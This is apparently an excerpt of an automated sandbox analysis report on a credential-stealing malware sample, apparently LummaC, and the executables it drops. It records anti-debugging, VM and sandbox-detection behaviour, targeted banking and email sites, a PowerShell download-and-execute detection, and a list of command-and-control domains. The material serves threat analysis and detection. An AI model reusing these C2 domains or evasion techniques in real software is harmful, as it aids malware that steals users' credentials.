Source: C:\Users\user\Desktop\file.exe TID: 7600 Thread sleep time: -270000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe TID: 7152 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7184 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7184 Thread sleep time: -62031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176 Thread sleep count: 1297 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176 Thread sleep time: -2595297s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8188 Thread sleep count: 1064 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8188 Thread sleep time: -2129064s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8148 Thread sleep count: 289 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8148 Thread sleep time: -8670000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7460 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6352 Thread sleep count: 1398 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6352 Thread sleep time: -2797398s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184 Thread sleep count: 1017 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184 Thread sleep time: -2035017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1476 Thread sleep count: 1425 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1476 Thread sleep time: -2851425s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe TID: 7136 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe TID: 6204 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe TID: 5940 Thread sleep count: 126 > 30
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe TID: 5940 Thread sleep count: 132 > 30
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe TID: 7180 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe TID: 6004 Thread sleep count: 987 > 30
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe TID: 6004 Thread sleep count: 101 > 30
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe TID: 7856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe TID: 7416 Thread sleep time: -90000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: skotes.exe, skotes.exe, 00000009.00000002.1770858812.00000000007AA000.00000040.00000001.01000000.0000000B.sdmp, 8138ba21a1.exe, 0000000A.00000002.1813198385.0000000000601000.00000040.00000001.01000000.0000000F.sdmp, bd214fbd32.exe, 0000000E.00000002.1926320177.0000000000445000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.0000000001167000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware>
Source: firefox.exe, 0000001D.00000002.2123319128.000001C958B44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWuYe
Source: file.exe, 00000000.00000003.1417736971.000000000118E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417736971.000000000119B000.00000004.00000020.00020000.00000000.sdmp, J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815101814.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815101814.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1814788678.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000111E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarel
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D74000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXx
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: firefox.exe, 0000001D.00000002.2123319128.000001C958B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: firefox.exe, 0000001D.00000002.2123319128.000001C958B39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW6634-1003_Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32)).
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: G4X9C8XP66LPZY0PX2HHB5N.exe, 00000003.00000002.1635804664.000000000077A000.00000040.00000001.01000000.00000006.sdmp, J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1688949555.0000000000865000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.1688839922.00000000007AA000.00000040.00000001.01000000.0000000B.sdmp, 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000002.1779960221.0000000000597000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000002.1770858812.00000000007AA000.00000040.00000001.01000000.0000000B.sdmp, 8138ba21a1.exe, 0000000A.00000002.1813198385.0000000000601000.00000040.00000001.01000000.0000000F.sdmp, bd214fbd32.exe, 0000000E.00000002.1926320177.0000000000445000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: firefox.exe, 0000001D.00000002.2123319128.000001C958BDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:A
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe System information queried: CodeIntegrityInformation
Source: C:\Windows\SysWOW64\taskkill.exe System information queried: CodeIntegrityInformation
Source: C:\Windows\SysWOW64\taskkill.exe System information queried: CodeIntegrityInformation
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Code function: 3_2_04D50B3F rdtsc 3_2_04D50B3F
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: J2IWSCR5FJAMGGW2VC4ET4.exe PID: 7932, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bd214fbd32.exe PID: 4864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 320, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe, type: DROPPED
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe "C:\Users\user~1\AppData\Local\Temp\1001091001\bd214fbd32.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe "C:\Users\user~1\AppData\Local\Temp\1001092001\136916b3ff.exe" Jump to behavior
